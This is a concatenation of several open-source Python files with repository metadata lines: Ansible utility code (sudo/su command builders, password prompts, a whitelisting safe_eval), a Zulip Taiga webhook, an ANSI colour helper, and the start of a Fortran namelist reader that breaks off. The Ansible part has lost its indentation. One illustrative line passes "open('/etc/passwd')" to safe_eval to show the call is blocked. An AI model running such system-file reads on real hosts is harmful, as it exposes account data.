parser.add_option("-s", "--sudo", default=constants.DEFAULT_SUDO, action="store_true", dest='sudo',
help="run operations with sudo (nopasswd) (deprecated, use become)")
parser.add_option('-U', '--sudo-user', dest='sudo_user', default=None,
help='desired sudo user (default=root) (deprecated, use become)')
parser.add_option('-S', '--su', default=constants.DEFAULT_SU, action='store_true',
help='run operations with su (deprecated, use become)')
parser.add_option('-R', '--su-user', default=None,
help='run operations with su as this user (default=%s) (deprecated, use become)' % constants.DEFAULT_SU_USER)
# consolidated privilege escalation (become)
parser.add_option("-b", "--become", default=constants.DEFAULT_BECOME, action="store_true", dest='become',
help="run operations with become (nopasswd implied)")
parser.add_option('--become-method', dest='become_method', default=constants.DEFAULT_BECOME_METHOD, type='string',
help="privilege escalation method to use (default=%s), valid choices: [ %s ]" % (constants.DEFAULT_BECOME_METHOD, ' | '.join(constants.BECOME_METHODS)))
parser.add_option('--become-user', default=None, dest='become_user', type='string',
help='run operations as this user (default=%s)' % constants.DEFAULT_BECOME_USER)
parser.add_option('--ask-become-pass', default=False, dest='become_ask_pass', action='store_true',
help='ask for privilege escalation password')
if connect_opts:
parser.add_option('-c', '--connection', dest='connection',
default=constants.DEFAULT_TRANSPORT,
help="connection type to use (default=%s)" % constants.DEFAULT_TRANSPORT)
if async_opts:
parser.add_option('-P', '--poll', default=constants.DEFAULT_POLL_INTERVAL, type='int',
dest='poll_interval',
help="set the poll interval if using -B (default=%s)" % constants.DEFAULT_POLL_INTERVAL)
parser.add_option('-B', '--background', dest='seconds', type='int', default=0,
help='run asynchronously, failing after X seconds (default=N/A)')
if check_opts:
parser.add_option("-C", "--check", default=False, dest='check', action='store_true',
help="don't make any changes; instead, try to predict some of the changes that may occur"
)
if diff_opts:
parser.add_option("-D", "--diff", default=False, dest='diff', action='store_true',
help="when changing (small) files and templates, show the differences in those files; works great with --check"
)
return parser
def parse_extra_vars(extra_vars_opts, vault_pass):
extra_vars = {}
for extra_vars_opt in extra_vars_opts:
extra_vars_opt = to_unicode(extra_vars_opt)
if extra_vars_opt.startswith(u"@"):
# Argument is a YAML file (JSON is a subset of YAML)
extra_vars = combine_vars(extra_vars, parse_yaml_from_file(extra_vars_opt[1:], vault_password=vault_pass))
elif extra_vars_opt and extra_vars_opt[0] in u'[{':
# Arguments as YAML
extra_vars = combine_vars(extra_vars, parse_yaml(extra_vars_opt))
else:
# Arguments as Key-value
extra_vars = combine_vars(extra_vars, parse_kv(extra_vars_opt))
return extra_vars
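# Illustrative sketch (editorial addition, not from the original module): -e options
# given as key=value and as inline JSON/YAML are parsed and combined; values are
# illustrative.
def _example_parse_extra_vars():
    return parse_extra_vars(['region=us-east-1', '{"debug": true}'], vault_pass=None)
    # -> {'region': 'us-east-1', 'debug': True}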
def ask_vault_passwords(ask_vault_pass=False, ask_new_vault_pass=False, confirm_vault=False, confirm_new=False):
vault_pass = None
new_vault_pass = None
if ask_vault_pass:
vault_pass = getpass.getpass(prompt="Vault password: ")
if ask_vault_pass and confirm_vault:
vault_pass2 = getpass.getpass(prompt="Confirm Vault password: ")
if vault_pass != vault_pass2:
raise errors.AnsibleError("Passwords do not match")
if ask_new_vault_pass:
new_vault_pass = getpass.getpass(prompt="New Vault password: ")
if ask_new_vault_pass and confirm_new:
new_vault_pass2 = getpass.getpass(prompt="Confirm New Vault password: ")
if new_vault_pass != new_vault_pass2:
raise errors.AnsibleError("Passwords do not match")
# enforce no newline chars at the end of passwords
if vault_pass:
vault_pass = to_bytes(vault_pass, errors='strict', nonstring='simplerepr').strip()
if new_vault_pass:
new_vault_pass = to_bytes(new_vault_pass, errors='strict', nonstring='simplerepr').strip()
return vault_pass, new_vault_pass
def ask_passwords(ask_pass=False, become_ask_pass=False, ask_vault_pass=False, become_method=C.DEFAULT_BECOME_METHOD):
sshpass = None
becomepass = None
vaultpass = None
become_prompt = ''
if ask_pass:
sshpass = getpass.getpass(prompt="SSH password: ")
become_prompt = "%s password[defaults to SSH password]: " % become_method.upper()
if sshpass:
sshpass = to_bytes(sshpass, errors='strict', nonstring='simplerepr')
else:
become_prompt = "%s password: " % become_method.upper()
if become_ask_pass:
becomepass = getpass.getpass(prompt=become_prompt)
if ask_pass and becomepass == '':
becomepass = sshpass
if becomepass:
becomepass = to_bytes(becomepass)
if ask_vault_pass:
vaultpass = getpass.getpass(prompt="Vault password: ")
if vaultpass:
vaultpass = to_bytes(vaultpass, errors='strict', nonstring='simplerepr').strip()
return (sshpass, becomepass, vaultpass)
def choose_pass_prompt(options):
if options.ask_su_pass:
return 'su'
elif options.ask_sudo_pass:
return 'sudo'
return options.become_method
def normalize_become_options(options):
options.become_ask_pass = options.become_ask_pass or options.ask_sudo_pass or options.ask_su_pass or C.DEFAULT_BECOME_ASK_PASS
options.become_user = options.become_user or options.sudo_user or options.su_user or C.DEFAULT_BECOME_USER
if options.become:
pass
elif options.sudo:
options.become = True
options.become_method = 'sudo'
elif options.su:
options.become = True
options.become_method = 'su'
def do_encrypt(result, encrypt, salt_size=None, salt=None):
if PASSLIB_AVAILABLE:
try:
crypt = getattr(passlib.hash, encrypt)
except:
raise errors.AnsibleError("passlib does not support '%s' algorithm" % encrypt)
if salt_size:
result = crypt.encrypt(result, salt_size=salt_size)
elif salt:
result = crypt.encrypt(result, salt=salt)
else:
result = crypt.encrypt(result)
else:
raise errors.AnsibleError("passlib must be installed to encrypt vars_prompt values")
return result
def last_non_blank_line(buf):
all_lines = buf.splitlines()
all_lines.reverse()
for line in all_lines:
if (len(line) > 0):
return line
# shouldn't occur unless there's no output
return ""
def filter_leading_non_json_lines(buf):
'''
used to avoid random output from SSH at the top of JSON output, like messages from
    tcgetattr, or where dropbear spews MOTD on every single command (which is nuts).
    need to filter out any leading line that does not start with '{' or '['.
filter only leading lines since multiline JSON is valid.
'''
filtered_lines = StringIO.StringIO()
stop_filtering = False
for line in buf.splitlines():
if stop_filtering or line.startswith('{') or line.startswith('['):
stop_filtering = True
filtered_lines.write(line + '\n')
return filtered_lines.getvalue()
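# Illustrative sketch (editorial addition, not from the original module): leading
# SSH/MOTD noise is dropped and everything from the first JSON-looking line onward
# is kept; the noise line below is illustrative.
def _example_filter_leading_non_json_lines():
    return filter_leading_non_json_lines('mesg: ttyname failed\n{"changed": false}\n')
    # -> '{"changed": false}\n'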
def boolean(value):
val = str(value)
if val.lower() in [ "true", "t", "y", "1", "yes" ]:
return True
else:
return False
def make_become_cmd(cmd, user, shell, method, flags=None, exe=None):
"""
helper function for connection plugins to create privilege escalation commands
"""
randbits = ''.join(chr(random.randint(ord('a'), ord('z'))) for x in xrange(32))
success_key = 'BECOME-SUCCESS-%s' % randbits
prompt = None
becomecmd = None
shell = shell or '$SHELL'
if method == 'sudo':
# Rather than detect if sudo wants a password this time, -k makes sudo always ask for
# a password if one is required. Passing a quoted compound command to sudo (or sudo -s)
# directly doesn't work, so we shellquote it with pipes.quote() and pass the quoted
# string to the user's shell. We loop reading output until we see the randomly-generated
# sudo prompt set with the -p option.
prompt = '[sudo via ansible, key=%s] password: ' % randbits
exe = exe or C.DEFAULT_SUDO_EXE
becomecmd = '%s -k && %s %s -S -p "%s" -u %s %s -c %s' % \
(exe, exe, flags or C.DEFAULT_SUDO_FLAGS, prompt, user, shell, pipes.quote('echo %s; %s' % (success_key, cmd)))
elif method == 'su':
exe = exe or C.DEFAULT_SU_EXE
flags = flags or C.DEFAULT_SU_FLAGS
becomecmd = '%s %s %s -c "%s -c %s"' % (exe, flags, user, shell, pipes.quote('echo %s; %s' % (success_key, cmd)))
elif method == 'pbrun':
prompt = 'assword:'
exe = exe or 'pbrun'
flags = flags or ''
becomecmd = '%s -b -l %s -u %s "%s"' % (exe, flags, user, pipes.quote('echo %s; %s' % (success_key,cmd)))
elif method == 'pfexec':
exe = exe or 'pfexec'
flags = flags or ''
        # No user as it uses its own exec_attr to figure it out
becomecmd = '%s %s "%s"' % (exe, flags, pipes.quote('echo %s; %s' % (success_key,cmd)))
if becomecmd is None:
raise errors.AnsibleError("Privilege escalation method not found: %s" % method)
return (('%s -c ' % shell) + pipes.quote(becomecmd), prompt, success_key)
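# Illustrative sketch (editorial addition, assumed usage, not from the original module):
# shape of the tuple returned for the sudo method (arguments are illustrative). The
# exact command depends on the configured sudo executable and flags, and the success
# key/prompt are random per call, roughly:
#   "/bin/sh -c 'sudo -k && sudo <flags> -S -p \"[sudo via ansible, key=...] password: \" -u root /bin/sh -c ...'"
def _example_make_become_cmd():
    return make_become_cmd('/bin/true', 'root', '/bin/sh', 'sudo')
    # -> (command_string, prompt, success_key)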
def make_sudo_cmd(sudo_exe, sudo_user, executable, cmd):
"""
helper function for connection plugins to create sudo commands
"""
return make_become_cmd(cmd, sudo_user, executable, 'sudo', C.DEFAULT_SUDO_FLAGS, sudo_exe)
def make_su_cmd(su_user, executable, cmd):
"""
Helper function for connection plugins to create direct su commands
"""
return make_become_cmd(cmd, su_user, executable, 'su', C.DEFAULT_SU_FLAGS, C.DEFAULT_SU_EXE)
def get_diff(diff):
# called by --diff usage in playbook and runner via callbacks
# include names in diffs 'before' and 'after' and do diff -U 10
try:
with warnings.catch_warnings():
warnings.simplefilter('ignore')
ret = []
if 'dst_binary' in diff:
ret.append("diff skipped: destination file appears to be binary\n")
if 'src_binary' in diff:
ret.append("diff skipped: source file appears to be binary\n")
if 'dst_larger' in diff:
ret.append("diff skipped: destination file size is greater than %d\n" % diff['dst_larger'])
if 'src_larger' in diff:
ret.append("diff skipped: source file size is greater than %d\n" % diff['src_larger'])
if 'before' in diff and 'after' in diff:
if 'before_header' in diff:
before_header = "before: %s" % diff['before_header']
else:
before_header = 'before'
if 'after_header' in diff:
after_header = "after: %s" % diff['after_header']
else:
after_header = 'after'
differ = difflib.unified_diff(to_unicode(diff['before']).splitlines(True), to_unicode(diff['after']).splitlines(True), before_header, after_header, '', '', 10)
for line in list(differ):
ret.append(line)
return u"".join(ret)
except UnicodeDecodeError:
return ">> the files are different, but the diff library cannot compare unicode strings"
def is_list_of_strings(items):
for x in items:
if not isinstance(x, basestring):
return False
return True
def list_union(a, b):
result = []
for x in a:
if x not in result:
result.append(x)
for x in b:
if x not in result:
result.append(x)
return result
def list_intersection(a, b):
result = []
for x in a:
if x in b and x not in result:
result.append(x)
return result
def list_difference(a, b):
result = []
for x in a:
if x not in b and x not in result:
result.append(x)
for x in b:
if x not in a and x not in result:
result.append(x)
return result
def contains_vars(data):
'''
returns True if the data contains a variable pattern
'''
return "$" in data or "{{" in data
def safe_eval(expr, locals={}, include_exceptions=False):
'''
This is intended for allowing things like:
with_items: a_list_variable
Where Jinja2 would return a string but we do not want to allow it to
call functions (outside of Jinja2, where the env is constrained). If
the input data to this function came from an untrusted (remote) source,
it should first be run through _clean_data_struct() to ensure the data
is further sanitized prior to evaluation.
Based on:
http://stackoverflow.com/questions/12523516/using-ast-and-whitelists-to-make-pythons-eval-safe
'''
# this is the whitelist of AST nodes we are going to
# allow in the evaluation. Any node type other than
# those listed here will raise an exception in our custom
# visitor class defined below.
SAFE_NODES = set(
(
ast.Add,
ast.BinOp,
ast.Call,
ast.Compare,
ast.Dict,
ast.Div,
ast.Expression,
ast.List,
ast.Load,
ast.Mult,
ast.Num,
ast.Name,
ast.Str,
ast.Sub,
ast.Tuple,
ast.UnaryOp,
)
)
# AST node types were expanded after 2.6
if not sys.version.startswith('2.6'):
        SAFE_NODES = SAFE_NODES.union(set((ast.Set,)))
filter_list = []
for filter in filter_loader.all():
filter_list.extend(filter.filters().keys())
CALL_WHITELIST = C.DEFAULT_CALLABLE_WHITELIST + filter_list
class CleansingNodeVisitor(ast.NodeVisitor):
def generic_visit(self, node, inside_call=False):
if type(node) not in SAFE_NODES:
raise Exception("invalid expression (%s)" % expr)
elif isinstance(node, ast.Call):
inside_call = True
elif isinstance(node, ast.Name) and inside_call:
if hasattr(builtin, node.id) and node.id not in CALL_WHITELIST:
raise Exception("invalid function: %s" % node.id)
# iterate over all child nodes
for child_node in ast.iter_child_nodes(node):
self.generic_visit(child_node, inside_call)
if not isinstance(expr, basestring):
# already templated to a datastructure, perhaps?
if include_exceptions:
return (expr, None)
return expr
cnv = CleansingNodeVisitor()
try:
parsed_tree = ast.parse(expr, mode='eval')
cnv.visit(parsed_tree)
compiled = compile(parsed_tree, expr, 'eval')
result = eval(compiled, {}, locals)
if include_exceptions:
return (result, None)
else:
return result
except SyntaxError, e:
# special handling for syntax errors, we just return
# the expression string back as-is
if include_exceptions:
return (expr, None)
return expr
except Exception, e:
if include_exceptions:
return (expr, e)
return expr
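# Illustrative sketch (editorial addition, assumed usage, not from the original module):
# whitelisted literal and arithmetic expressions are evaluated, while an expression
# calling a builtin that is not whitelisted is returned unchanged (with the exception
# when include_exceptions=True). Assumes 'open' is not in the configured callable whitelist.
def _example_safe_eval():
    ok = safe_eval("[1, 2] + [3]")  # -> [1, 2, 3]
    blocked, exc = safe_eval("open('/etc/passwd')", include_exceptions=True)
    return ok, blocked, exc  # blocked is the original expression string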
def listify_lookup_plugin_terms(terms, basedir, inject):
from ansible.utils import template
if isinstance(terms, basestring):
# someone did:
# with_items: alist
# OR
# with_items: {{ alist }}
stripped = terms.strip()
if not (stripped.startswith('{') or stripped.startswith('[')) and \
not stripped.startswith("/") and \
not stripped.startswith('set([') and \
not LOOKUP_REGEX.search(terms):
# if not already a list, get ready to evaluate with Jinja2
# not sure why the "/" is in above code :)
try:
new_terms = template.template(basedir, "{{ %s }}" % terms, inject)
if isinstance(new_terms, basestring) and "{{" in new_terms:
pass
else:
terms = new_terms
except:
pass
if '{' in terms or '[' in terms:
# Jinja2 already evaluated a variable to a list.
# Jinja2-ified list needs to be converted back to a real type
# TODO: something a bit less heavy than eval
return safe_eval(terms)
if isinstance(terms, basestring):
terms = [ terms ]
return terms
def combine_vars(a, b):
_validate_both_dicts(a, b)
if C.DEFAULT_HASH_BEHAVIOUR == "merge":
return merge_hash(a, b)
else:
return dict(a.items() + b.items())
def random_password(length=20, chars=C.DEFAULT_PASSWORD_CHARS):
'''Return a random password string of length containing only chars.'''
password = []
while len(password) < length:
new_char = os.urandom(1)
if new_char in chars:
password.append(new_char)
return ''.join(password)
def before_comment(msg):
''' what's the part of a string before a comment? '''
msg = msg.replace("\#","**NOT_A_COMMENT**")
msg = msg.split("#")[0]
msg = msg.replace("**NOT_A_COMMENT**","#")
return msg
def load_vars(basepath, results, vault_password=None):
"""
Load variables from any potential yaml filename combinations of basepath,
returning result.
"""
paths_to_check = [ "".join([basepath, ext])
for ext in C.YAML_FILENAME_EXTENSIONS ]
found_paths = []
for path in paths_to_check:
found, results = _load_vars_from_path(path, results, vault_password=vault_password)
if found:
found_paths.append(path)
# disallow the potentially confusing situation that there are multiple
# variable files for the same name. For example if both group_vars/all.yml
    # and group_vars/all.yaml exist.
if len(found_paths) > 1:
raise errors.AnsibleError("Multiple variable files found. "
"There should only be one. %s" % ( found_paths, ))
return results
## load variables from yaml files/dirs
# e.g. host/group_vars
#
def _load_vars_from_path(path, results, vault_password=None):
"""
Robustly access the file at path and load variables, carefully reporting
errors in a friendly/informative way.
Return the tuple (found, new_results, )
"""
try:
# in the case of a symbolic link, we want the stat of the link itself,
# not its target
pathstat = os.lstat(path)
except os.error, err:
# most common case is that nothing exists at that path.
if err.errno == errno.ENOENT:
return False, results
# otherwise this is a condition we should report to the user
raise errors.AnsibleError(
"%s is not accessible: %s."
" Please check its permissions." % ( path, err.strerror))
# symbolic link
if stat.S_ISLNK(pathstat.st_mode):
try:
target = os.path.realpath(path)
except os.error, err2:
raise errors.AnsibleError("The symbolic link at %s "
"is not readable: %s. Please check its permissions."
% (path, err2.strerror, ))
# follow symbolic link chains by recursing, so we repeat the same
# permissions checks above and provide useful errors.
return _load_vars_from_path(target, results, vault_password)
# directory
if stat.S_ISDIR(pathstat.st_mode):
# support organizing variables across multiple files in a directory
return True, _load_vars_from_folder(path, results, vault_password=vault_password)
# regular file
elif stat.S_ISREG(pathstat.st_mode):
data = parse_yaml_from_file(path, vault_password=vault_password)
if data and type(data) != dict:
raise errors.AnsibleError(
"%s must be stored as a dictionary/hash" % path)
elif data is None:
data = {}
# combine vars overrides by default but can be configured to do a
# hash merge in settings
results = combine_vars(results, data)
return True, results
# something else? could be a fifo, socket, device, etc.
else:
raise errors.AnsibleError("Expected a variable file or directory "
"but found a non-file object at path %s" % (path, ))
def _load_vars_from_folder(folder_path, results, vault_password=None):
"""
Load all variables within a folder recursively.
"""
# this function and _load_vars_from_path are mutually recursive
try:
names = os.listdir(folder_path)
except os.error, err:
raise errors.AnsibleError(
"This folder cannot be listed: %s: %s."
% ( folder_path, err.strerror))
# evaluate files in a stable order rather than whatever order the
# filesystem lists them.
names.sort()
# do not parse hidden files or dirs, e.g. .svn/
paths = [os.path.join(folder_path, name) for name in names if not name.startswith('.')]
for path in paths:
_found, results = _load_vars_from_path(path, results, vault_password=vault_password)
return results
def update_hash(hash, key, new_value):
''' used to avoid nested .update calls on the parent '''
value = hash.get(key, {})
value.update(new_value)
hash[key] = value
def censor_unlogged_data(data):
'''
used when the no_log: True attribute is passed to a task to keep data from a callback.
NOT intended to prevent variable registration, but only things from showing up on
screen
'''
new_data = {}
for (x,y) in data.iteritems():
if x in [ 'skipped', 'changed', 'failed', 'rc' ]:
new_data[x] = y
new_data['censored'] = 'results hidden due to no_log parameter'
return new_data
def check_mutually_exclusive_privilege(options, parser):
# privilege escalation command line arguments need to be mutually exclusive
if (options.su or options.su_user or options.ask_su_pass) and \
(options.sudo or options.sudo_user or options.ask_sudo_pass) or \
(options.su or options.su_user or options.ask_su_pass) and \
(options.become or options.become_user or options.become_ask_pass) or \
(options.sudo or options.sudo_user or options.ask_sudo_pass) and \
(options.become or options.become_user or options.become_ask_pass):
parser.error("Sudo arguments ('--sudo', '--sudo-user', and '--ask-sudo-pass') "
"and su arguments ('-su', '--su-user', and '--ask-su-pass') "
"and become arguments ('--become', '--become-user', and '--ask-become-pass')"
" are exclusive of each other")
| muravjov/ansible | lib/ansible/utils/__init__.py | Python | gpl-3.0 | 60,718 | 0.004957 |
"""
Taiga integration for Zulip.
Tips for notification output:
*Emojis*: most of the events have specific emojis e.g.
- :notebook: - change of subject/name/description
- :chart_with_upwards_trend: - change of status
etc. If there's no meaningful emoji for a certain event, the defaults are used:
- :thought_balloon: - event connected to commenting
- :busts_in_silhouette: - event connected to a certain user
- :package: - all other events connected to user story
- :calendar: - all other events connected to milestones
- :clipboard: - all other events connected to tasks
- :bulb: - all other events connected to issues
*Text formatting*: if there has been a change of a property, the new value should always be in bold; otherwise the
subject of US/task should be in bold.
"""
from __future__ import absolute_import
from typing import Any, Dict, Mapping, Optional, Tuple, Text
from django.utils.translation import ugettext as _
from django.http import HttpRequest, HttpResponse
from zerver.lib.actions import check_send_message
from zerver.lib.response import json_success, json_error
from zerver.decorator import REQ, has_request_variables, api_key_only_webhook_view
from zerver.models import UserProfile, Client
import ujson
from six.moves import range
@api_key_only_webhook_view('Taiga')
@has_request_variables
def api_taiga_webhook(request, user_profile, client, message=REQ(argument_type='body'),
stream=REQ(default='taiga'), topic=REQ(default='General')):
# type: (HttpRequest, UserProfile, Client, Dict[str, Any], Text, Text) -> HttpResponse
parsed_events = parse_message(message)
content_lines = []
for event in parsed_events:
content_lines.append(generate_content(event) + '\n')
content = "".join(sorted(content_lines))
check_send_message(user_profile, client, 'stream', [stream], topic, content)
return json_success()
templates = {
'userstory': {
'create': u':package: %(user)s created user story **%(subject)s**.',
'set_assigned_to': u':busts_in_silhouette: %(user)s assigned user story **%(subject)s** to %(new)s.',
'unset_assigned_to': u':busts_in_silhouette: %(user)s unassigned user story **%(subject)s**.',
'changed_assigned_to': u':busts_in_silhouette: %(user)s reassigned user story **%(subject)s**'
' from %(old)s to %(new)s.',
'points': u':game_die: %(user)s changed estimation of user story **%(subject)s**.',
'blocked': u':lock: %(user)s blocked user story **%(subject)s**.',
'unblocked': u':unlock: %(user)s unblocked user story **%(subject)s**.',
'set_milestone': u':calendar: %(user)s added user story **%(subject)s** to sprint %(new)s.',
'unset_milestone': u':calendar: %(user)s removed user story **%(subject)s** from sprint %(old)s.',
'changed_milestone': u':calendar: %(user)s changed sprint of user story **%(subject)s** from %(old)s'
' to %(new)s.',
'changed_status': u':chart_with_upwards_trend: %(user)s changed status of user story **%(subject)s**'
' from %(old)s to %(new)s.',
'closed': u':checkered_flag: %(user)s closed user story **%(subject)s**.',
'reopened': u':package: %(user)s reopened user story **%(subject)s**.',
'renamed': u':notebook: %(user)s renamed user story from %(old)s to **%(new)s**.',
'description_diff': u':notebook: %(user)s updated description of user story **%(subject)s**.',
'commented': u':thought_balloon: %(user)s commented on user story **%(subject)s**.',
'delete': u':x: %(user)s deleted user story **%(subject)s**.'
},
'milestone': {
'create': u':calendar: %(user)s created sprint **%(subject)s**.',
'renamed': u':notebook: %(user)s renamed sprint from %(old)s to **%(new)s**.',
'estimated_start': u':calendar: %(user)s changed estimated start of sprint **%(subject)s**'
' from %(old)s to %(new)s.',
'estimated_finish': u':calendar: %(user)s changed estimated finish of sprint **%(subject)s**'
' from %(old)s to %(new)s.',
'delete': u':x: %(user)s deleted sprint **%(subject)s**.'
},
'task': {
'create': u':clipboard: %(user)s created task **%(subject)s**.',
'set_assigned_to': u':busts_in_silhouette: %(user)s assigned task **%(subject)s** to %(new)s.',
'unset_assigned_to': u':busts_in_silhouette: %(user)s unassigned task **%(subject)s**.',
'changed_assigned_to': u':busts_in_silhouette: %(user)s reassigned task **%(subject)s**'
' from %(old)s to %(new)s.',
'blocked': u':lock: %(user)s blocked task **%(subject)s**.',
'unblocked': u':unlock: %(user)s unblocked task **%(subject)s**.',
'set_milestone': u':calendar: %(user)s added task **%(subject)s** to sprint %(new)s.',
'changed_milestone': u':calendar: %(user)s changed sprint of task **%(subject)s** from %(old)s to %(new)s.',
'changed_status': u':chart_with_upwards_trend: %(user)s changed status of task **%(subject)s**'
' from %(old)s to %(new)s.',
'renamed': u':notebook: %(user)s renamed task %(old)s to **%(new)s**.',
'description_diff': u':notebook: %(user)s updated description of task **%(subject)s**.',
'commented': u':thought_balloon: %(user)s commented on task **%(subject)s**.',
'delete': u':x: %(user)s deleted task **%(subject)s**.',
'changed_us': u':clipboard: %(user)s moved task **%(subject)s** from user story %(old)s to %(new)s.'
},
'issue': {
'create': u':bulb: %(user)s created issue **%(subject)s**.',
        'set_assigned_to': u':busts_in_silhouette: %(user)s assigned issue **%(subject)s** to %(new)s.',
'unset_assigned_to': u':busts_in_silhouette: %(user)s unassigned issue **%(subject)s**.',
'changed_assigned_to': u':busts_in_silhouette: %(user)s reassigned issue **%(subject)s**'
' from %(old)s to %(new)s.',
'changed_priority': u':rocket: %(user)s changed priority of issue **%(subject)s** from %(old)s to %(new)s.',
'changed_severity': u':warning: %(user)s changed severity of issue **%(subject)s** from %(old)s to %(new)s.',
'changed_status': u':chart_with_upwards_trend: %(user)s changed status of issue **%(subject)s**'
' from %(old)s to %(new)s.',
'changed_type': u':bulb: %(user)s changed type of issue **%(subject)s** from %(old)s to %(new)s.',
'renamed': u':notebook: %(user)s renamed issue %(old)s to **%(new)s**.',
'description_diff': u':notebook: %(user)s updated description of issue **%(subject)s**.',
'commented': u':thought_balloon: %(user)s commented on issue **%(subject)s**.',
'delete': u':x: %(user)s deleted issue **%(subject)s**.'
},
}
def get_old_and_new_values(change_type, message):
# type: (str, Mapping[str, Any]) -> Tuple[Optional[Dict[str, Any]], Optional[Dict[str, Any]]]
""" Parses the payload and finds previous and current value of change_type."""
if change_type in ['subject', 'name', 'estimated_finish', 'estimated_start']:
old = message["change"]["diff"][change_type]["from"]
new = message["change"]["diff"][change_type]["to"]
return old, new
try:
old = message["change"]["diff"][change_type]["from"]
except KeyError:
old = None
try:
new = message["change"]["diff"][change_type]["to"]
except KeyError:
new = None
return old, new
def parse_comment(message):
# type: (Mapping[str, Any]) -> Dict[str, Any]
""" Parses the comment to issue, task or US. """
return {
'event': 'commented',
'type': message["type"],
'values': {
'user': get_owner_name(message),
'subject': get_subject(message)
}
}
def parse_create_or_delete(message):
# type: (Mapping[str, Any]) -> Dict[str, Any]
""" Parses create or delete event. """
return {
'type': message["type"],
'event': message["action"],
'values':
{
'user': get_owner_name(message),
'subject': get_subject(message)
}
}
def parse_change_event(change_type, message):
# type: (str, Mapping[str, Any]) -> Dict[str, Any]
""" Parses change event. """
evt = {} # type: Dict[str, Any]
values = {
'user': get_owner_name(message),
'subject': get_subject(message)
} # type: Dict[str, Any]
if change_type in ["description_diff", "points"]:
event_type = change_type
elif change_type in ["milestone", "assigned_to"]:
old, new = get_old_and_new_values(change_type, message)
if not old:
event_type = "set_" + change_type
values["new"] = new
elif not new:
event_type = "unset_" + change_type
values["old"] = old
else:
event_type = "changed_" + change_type
values.update({'old': old, 'new': new})
elif change_type == "is_blocked":
if message["change"]["diff"]["is_blocked"]["to"]:
event_type = "blocked"
else:
event_type = "unblocked"
elif change_type == "is_closed":
if message["change"]["diff"]["is_closed"]["to"]:
event_type = "closed"
else:
event_type = "reopened"
elif change_type == "user_story":
old, new = get_old_and_new_values(change_type, message)
event_type = "changed_us"
values.update({'old': old, 'new': new})
elif change_type in ["subject", 'name']:
event_type = 'renamed'
old, new = get_old_and_new_values(change_type, message)
values.update({'old': old, 'new': new})
elif change_type in ["estimated_finish", "estimated_start"]:
old, new = get_old_and_new_values(change_type, message)
if not old == new:
event_type = change_type
values.update({'old': old, 'new': new})
else:
# date hasn't changed
return None
elif change_type in ["priority", "severity", "type", "status"]:
event_type = 'changed_' + change_type
old, new = get_old_and_new_values(change_type, message)
values.update({'old': old, 'new': new})
else:
# we are not supporting this type of event
return None
evt.update({"type": message["type"], "event": event_type, "values": values})
return evt
def parse_message(message):
# type: (Mapping[str, Any]) -> List[Dict[str, Any]]
""" Parses the payload by delegating to specialized functions. """
events = []
if message["action"] in ['create', 'delete']:
events.append(parse_create_or_delete(message))
elif message["action"] == 'change':
if message["change"]["diff"]:
for value in message["change"]["diff"]:
parsed_event = parse_change_event(value, message)
if parsed_event:
events.append(parsed_event)
if message["change"]["comment"]:
events.append(parse_comment(message))
return events
def generate_content(data):
# type: (Mapping[str, Any]) -> str
""" Gets the template string and formats it with parsed data. """
try:
return templates[data['type']][data['event']] % data['values']
except KeyError:
return json_error(_("Unknown message"))
def get_owner_name(message):
# type: (Mapping[str, Any]) -> str
return message["by"]["full_name"]
def get_subject(message):
# type: (Mapping[str, Any]) -> str
data = message["data"]
return data.get("subject", data.get("name"))
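# Illustrative sketch (added for clarity, not part of the original handler): a
# minimal, assumed payload showing how parse_message() and generate_content()
# cooperate. The field names mirror the accesses above; this is not a verbatim
# Taiga example.
#
#   sample = {
#       'action': 'create',
#       'type': 'userstory',
#       'by': {'full_name': 'Alice'},
#       'data': {'subject': 'Add login page'},
#   }
#   parse_message(sample)
#   # -> [{'type': 'userstory', 'event': 'create',
#   #      'values': {'user': 'Alice', 'subject': 'Add login page'}}]
#   generate_content(parse_message(sample)[0])
#   # -> ':package: Alice created user story **Add login page**.'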
|
Diptanshu8/zulip
|
zerver/views/webhooks/taiga.py
|
Python
|
apache-2.0
| 11,660
| 0.00446
|
from __future__ import absolute_import
from __future__ import unicode_literals
NAMES = [
'grey',
'red',
'green',
'yellow',
'blue',
'magenta',
'cyan',
'white'
]
def get_pairs():
for i, name in enumerate(NAMES):
yield(name, str(30 + i))
yield('intense_' + name, str(30 + i) + ';1')
def ansi(code):
return '\033[{0}m'.format(code)
def ansi_color(code, s):
return '{0}{1}{2}'.format(ansi(code), s, ansi(0))
def make_color_fn(code):
return lambda s: ansi_color(code, s)
for (name, code) in get_pairs():
globals()[name] = make_color_fn(code)
def rainbow():
cs = ['cyan', 'yellow', 'green', 'magenta', 'red', 'blue',
'intense_cyan', 'intense_yellow', 'intense_green',
'intense_magenta', 'intense_red', 'intense_blue']
for c in cs:
yield globals()[c]
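# Usage sketch (added for illustration; the guard and prints below are not part
# of the original module). The loop above injects one function per color name
# into the module globals, so they can be called directly:
if __name__ == '__main__':
    print(red('error'))             # -> '\033[31merror\033[0m'
    print(intense_green('ok'))      # -> '\033[32;1mok\033[0m'
    print(''.join(f('*') for f in rainbow()))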
|
rht/universe
|
universe/remotes/compose/colors.py
|
Python
|
mit
| 860
| 0
|
""" IO classes for Omnivor input file
Copyright (C) 2013 DTU Wind Energy
Author: Emmanuel Branlard
Email: ebra@dtu.dk
Last revision: 25/11/2013
Namelist IO: basic functions to read and parse a Fortran namelist file into a Python dictionary and write it back to a file
The parser was adapted from: fortran-namelist on code.google with the following info:
__author__ = 'Stephane Chamberland (stephane.chamberland@ec.gc.ca)'
__version__ = '$Revision: 1.0 $'[11:-2]
__date__ = '$Date: 2006/09/05 21:16:24 $'
__copyright__ = 'Copyright (c) 2006 RPN'
__license__ = 'LGPL'
Recognizes files of the form:
&namelistname
opt1 = value1
...
/
"""
from __future__ import print_function
from we_file_io import WEFileIO, TestWEFileIO
import unittest
import numpy as np
import os.path as path
import sys
import re
import tempfile
import os
__author__ = 'E. Branlard '
class FortranNamelistIO(WEFileIO):
"""
Fortran Namelist IO class
Scan a Fortran Namelist file and put Section/Parameters into a dictionary
Write the file back if needed.
"""
def _write(self):
""" Write a file (overrided)
"""
with open(self.filename, 'w') as f:
for nml in self.data :
f.write('&'+nml+'\n')
# Sorting dictionary data (in the same order as it was created, thanks to id)
                SortedList = sorted(self.data[nml].items(), key=lambda kv: kv[1]['id'])
                # for param in self.data[nml]:
                for param, _ in SortedList:
f.write(param+'='+','.join(self.data[nml][param]['val']))
if len(self.data[nml][param]['com']) >0:
f.write(' !'+self.data[nml][param]['com'])
f.write('\n')
f.write('/\n')
def _read(self):
""" Read the file (overrided)
"""
with open(self.filename, 'r') as f:
data = f.read()
